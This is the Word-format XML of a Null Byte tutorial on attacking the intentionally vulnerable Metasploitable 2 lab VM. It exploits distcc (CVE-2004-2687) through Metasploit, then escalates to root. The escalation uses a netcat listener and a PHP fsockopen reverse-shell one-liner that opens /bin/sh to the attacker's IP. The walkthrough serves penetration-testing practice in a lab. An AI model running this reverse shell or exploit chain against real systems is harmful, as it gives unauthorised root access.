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12" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712">
      <w:pPr>
        <w:spacing w:after="0" w:line="264" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="0"/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</w:pPr>
      <w:r w:rsidRPr="00D73712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begin"/>
      </w:r>
      <w:r w:rsidRPr="00D73712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instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/hack-metasploitable-2-including-privilege-escalation-0170603/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D73712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separate"/>
      </w:r>
      <w:r w:rsidRPr="00D73712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Hack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D73712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>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D73712">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="63"/>
          <w:szCs w:val="63"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 Including Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73712">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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D73712">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BY </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00D73712">
          <w:rPr>
            <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="888888"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>BILL TSAPALOS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:ind w:left="225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D73712">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 04/25/2016 6:06 PM</w:t>
      </w:r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This guide is written for anyone who is practicing his penetration skills using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2. The problem that we are facing here is that we have to penetrate to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 and when this happens we understand that we are not logged in as root but as a user with less privileges!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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D73712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1</w:t>
      </w:r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Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 2</w:t>
      </w:r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We have to start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 (I suppose that the reader is able to do it without a guide) and record the IP. For our example the IP of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2 is "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73712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192.168.1.4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". The attackers IP is "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73712">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>192.168.1.6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" for this example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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D73712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2</w:t>
      </w:r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Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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First, we have to start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PostgreSQL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service (</w:t>
      </w:r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service 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postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spell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start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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="495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Then we are ready to start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</w:t>
      </w:r>
      <w:proofErr w:type="gram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framework(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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msfconsole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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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D73712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3</w:t>
      </w:r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Let the Penetration Begins</w:t>
      </w:r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One of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Metasploitable's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security issues is </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D73712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Exploit CVE 2004-2687</w:t>
        </w:r>
      </w:hyperlink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Go to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Metasploit's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console and search for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distcc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(</w:t>
      </w:r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search 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distcc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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6886575" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="12" name="Picture 12" descr="https://img.wonderhowto.com/img/97/25/63597103727692/0/hack-metasploitable-2-including-privilege-escalation.w1456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97/25/63597103727692/0/hack-metasploitable-2-including-privilege-escalation.w1456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9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we are ready to use the exploit and set the values we want for the RHOST, PAYLOAD and LHOST options.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3400425" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="11" name="Picture 11" descr="https://img.wonderhowto.com/img/86/62/63597104500855/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/86/62/63597104500855/0/hack-metasploitable-2-including-privilege-escalation.w1456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2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4333875" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10" name="Picture 10" descr="https://img.wonderhowto.com/img/85/96/63597104719941/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/85/96/63597104719941/0/hack-metasploitable-2-including-privilege-escalation.w1456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5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4819650" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="https://img.wonderhowto.com/img/68/55/63597104817452/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/68/55/63597104817452/0/hack-metasploitable-2-including-privilege-escalation.w1456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18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4191000" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8" name="Picture 8" descr="https://img.wonderhowto.com/img/08/21/63597104940736/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/08/21/63597104940736/0/hack-metasploitable-2-including-privilege-escalation.w1456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1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we are going to run the simple exploit command to exploit (</w:t>
      </w:r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exploit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 the target.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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6886575" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="https://img.wonderhowto.com/img/18/03/63597105282879/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/18/03/63597105282879/0/hack-metasploitable-2-including-privilege-escalation.w1456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4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The target is ours or almost ours?! Let's see who </w:t>
      </w:r>
      <w:proofErr w:type="gram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am I (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whoami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  <w:proofErr w:type="gram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6867525" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="6" name="Picture 6" descr="https://img.wonderhowto.com/img/81/34/63597105380545/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/81/34/63597105380545/0/hack-metasploitable-2-including-privilege-escalation.w1456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27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After all these commands I am a simple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deamon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 I want the root privilege so much...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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D73712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4</w:t>
      </w:r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Privilege Escalation 1/2</w:t>
      </w:r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Now press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Ctrl+C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to terminate the current connection to the target!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6886575" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="https://img.wonderhowto.com/img/12/55/63597105579059/0/hack-metasploitable-2-including-privilege-escalation.w1456.jp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wonderhowto.com/img/12/55/63597105579059/0/hack-metasploitable-2-including-privilege-escalation.w1456.jp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30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 exploit the target and send the job to the background (</w:t>
      </w:r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exploit -j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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6877050" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4" name="Picture 4" descr="https://img.wonderhowto.com/img/13/10/63597105881167/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/13/10/63597105881167/0/hack-metasploitable-2-including-privilege-escalation.w1456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33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But what? Wait a sec! It is not going to the background! It is waiting for an input. At this moment you are able to run just one command as root. A single line is separating you from root privileges! If you don't believe me run the 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whoami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command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and you will see! But do not run this if this is your first time reading this tutorial.</w:t>
      </w:r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At this point I should be clever. What do I want to run as root? Of course a reverse shell to my computer. So, let's start the server!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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D73712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5</w:t>
      </w:r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Run a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 Server</w:t>
      </w:r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Start a new terminal window and run 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netcat</w:t>
      </w:r>
      <w:proofErr w:type="spell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-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lvp</w:t>
      </w:r>
      <w:proofErr w:type="spell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5555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 Make sure that you are not running any service at 5555 port. If you do just pick your own port number!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2886075" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/86/50/63597106287783/0/hack-metasploitable-2-including-privilege-escalation.w1456.jp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wonderhowto.com/img/86/50/63597106287783/0/hack-metasploitable-2-including-privilege-escalation.w1456.jp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36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Now, the server is running and waiting for a connection!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712">
      <w:pPr>
        <w:spacing w:after="0" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center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D73712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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73712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Privilege Escalation 2/2</w:t>
      </w:r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Now we are back to the other terminal window,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A lot of people would run a reverse shell using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netcat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. But let's say that you have no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netcat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available at the server, what are you going to do? Even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lastRenderedPageBreak/>
        <w:t>Metasploitable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is some kind of server. Open your browser at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Metasploitable's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IP and you will see! You will see that you have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phpMyAdmin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! So, we are going to create a reverse shell using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php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Without more ado, go to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terminal and run the command: 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php</w:t>
      </w:r>
      <w:proofErr w:type="spell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-r '$sock=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spell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"192.168.1.6",5555);exec("/bin/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sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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-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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'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8867775" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/68/70/63597106937259/0/hack-metasploitable-2-including-privilege-escalation.w1456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wonderhowto.com/img/68/70/63597106937259/0/hack-metasploitable-2-including-privilege-escalation.w1456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39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After this, go the other terminal. Yes, the one with the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netcat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which is waiting! Something nice happened over there...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/00/57/63597107093823/0/hack-metasploitable-2-including-privilege-escalation.w1456.jp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.wonderhowto.com/img/00/57/63597107093823/0/hack-metasploitable-2-including-privilege-escalation.w1456.jp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12" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D7371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83838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D73712">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="A8A8A8"/>
          <w:spacing w:val="2"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Image via </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="00D73712">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="A8A8A8"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>postimg.org</w:t>
        </w:r>
      </w:hyperlink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Can you see that symbol (</w:t>
      </w:r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#</w:t>
      </w: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)</w:t>
      </w:r>
      <w:proofErr w:type="gram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.</w:t>
      </w:r>
      <w:proofErr w:type="gram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It is my favorite! You are logged in as root! If you don't believe me then ask your target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D73712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whoami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</w:t>
      </w:r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Who needs the </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D73712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CVE 2009-1185</w:t>
        </w:r>
      </w:hyperlink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 if you can do it without it! Maybe in the next tutorial I will use it!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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If you want to try more reverse shells see </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D73712">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="1888E1"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink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!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73712" w:rsidRPr="00D73712" w:rsidRDefault="00D73712" w:rsidP="00D73712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color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr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Be well and use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D73712">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> only!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00522B39" w:rsidRDefault="00D73712">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p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F3DFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="355A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32614"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEB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12"/>
    <w:rsid w:val="002512D0"/>
    <w:rsid w:val="00D73712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72B15-BBC1-4307-A033-01B440F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3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37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737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37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-label">
    <w:name w:val="margin-label"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D73712"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00D737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249">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="450"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="23" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="23" w:color="auto"/>
            <w:bottom w:val="single" w:sz="24" w:space="23" w:color="7ABD13"/>
            <w:right w:val="none" w:sz="0" w:space="23" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="491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g.wonderhowto.com/img/original/85/96/63597104719941/0/635971047199418596.jpg" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org/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://postimg.org/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/86/50/63597106287783/0/635971062877838650.jpg" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/97/25/63597103727692/0/635971037276929725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g.wonderhowto.com/img/original/68/55/63597104817452/0/635971048174526855.jpg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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687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postimg.org/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/68/70/63597106937259/0/635971069372596870.jpg" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/00/57/63597107093823/0/635971070938230057.jp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creator.wonderhowto.com/billythelittle-inactive12142018022133/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org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img.wonderhowto.com/img/original/12/55/63597105579059/0/635971055790591255.jpg" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/86/62/63597104500855/0/635971045008558662.jpg" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/08/21/63597104940736/0/635971049407360821.jpg" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/13/10/63597105881167/0/635971058811671310.jpg" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-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stimg.org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img.wonderhowto.com/img/original/18/03/63597105282879/0/635971052828791803.jpg" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202009-1185" TargetMode="Externa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hyperlink" Target="http://postimg.org/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img.wonderhowto.com/img/original/81/34/63597105380545/0/635971053805458134.jpg" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://postimg.org/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId4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2019-01-19T16:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-19T16:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>